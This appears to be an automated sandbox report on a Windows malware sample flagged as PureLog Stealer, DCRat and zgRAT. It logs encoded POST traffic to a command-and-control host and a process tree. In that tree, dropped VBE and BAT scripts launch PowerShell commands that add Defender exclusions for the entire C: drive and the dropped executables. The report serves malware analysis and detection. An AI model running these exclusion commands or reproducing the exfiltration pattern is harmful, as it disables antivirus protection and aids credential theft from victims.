                                                                        Dec 28, 2024 20:44:38.826888084 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKlqiQ3PIpg0bLyIniZ9Q2WkAhFeDbIjyTJPuPWEDcWuEtkmzS6l15j%2Fos7exYaS397qmzdveNw1OYmMN1URmhwLJtYxlAtTDTVcp3ZWm6HpA1zYM3C9FcCySW2G5BSU%2FE9LFg%2BO"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bd04a70422d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3764&min_rtt=1603&rtt_var=4923&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=77277&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        69192.168.2.450007104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:39.094348907 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:39.438631058 CET2580OUTData Raw: 53 52 5c 53 56 49 50 59 5d 5f 52 56 5a 58 58 5a 57 5e 5f 5b 54 57 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SR\SVIPY]_RVZXXZW^_[TWUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_?&! X45/;Y >1*0 :+U(,?9;X!;^><%\ ![(?
                                                                        Dec 28, 2024 20:44:40.271938086 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:40.525149107 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PN1sehaRhHZl%2ByCw6BZ4BelgW0csxEdYEWj6OjMh5AaocF1Kw6hWL36VAC40KJ6Ywv%2Fv0ppvmKoEZVPLHuCr%2FZljtphyTpetWjoRERmpCK0DRyP1fOWtPW%2FjbcyhdD5Zgb8AmF%2B8"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bdabcae8c09-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4354&min_rtt=1921&rtt_var=5587&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=68265&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        70192.168.2.450013104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:40.757334948 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:41.110549927 CET2584OUTData Raw: 53 56 59 57 56 48 50 5f 5d 5f 52 56 5a 50 58 55 57 5b 5f 50 54 53 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SVYWVHP_]_RVZPXUW[_PTSUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'?Z!6; _"%7,+'#"]=?V7) =,3. !0*,%\ ![(
                                                                        Dec 28, 2024 20:44:41.887303114 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:42.133778095 CET814INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RyoNZPlOSbzUBPKOOjdQfutVaw5f4qGHLODwc6s7ieE%2BqiZ3R5jZ6QIbvD%2BfAeiYqlGYDJavAB%2FF3JMy%2BXSedrgXN713SKUiSg%2FAmZthrliAS5LS9AXs%2FohlXX%2Byrn0j%2B4DvDRm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940be4ccf9f5f4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3349&min_rtt=1669&rtt_var=3987&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=96586&cwnd=102&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        71192.168.2.450019104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:42.371784925 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:43.503674984 CET25INHTTP/1.1 100 Continue


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:14:42:01
                                                                        Start date:28/12/2024
                                                                        Path:C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\ZZ2sTsJFrt.exe"
                                                                        Imagebase:0xf00000
                                                                        File size:2'330'001 bytes
                                                                        MD5 hash:403138422D8DA9FDD31FE147959A1403
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1677180578.0000000005330000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1676672997.00000000069F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:14:42:01
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe"
                                                                        Imagebase:0x2c0000
                                                                        File size:147'456 bytes
                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:14:42:02
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "
                                                                        Imagebase:0x240000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:14:42:02
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:14:42:02
                                                                        Start date:28/12/2024
                                                                        Path:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"
                                                                        Imagebase:0x4f0000
                                                                        File size:2'008'064 bytes
                                                                        MD5 hash:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1686573197.00000000004F2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 83%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:8
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                        Imagebase:0x800000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:10
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:12
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:14
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:16
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:19
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:20
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:21
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:22
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:23
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:24
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:25
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:26
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:27
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:28
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:29
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:30
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:31
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:32
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:33
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'
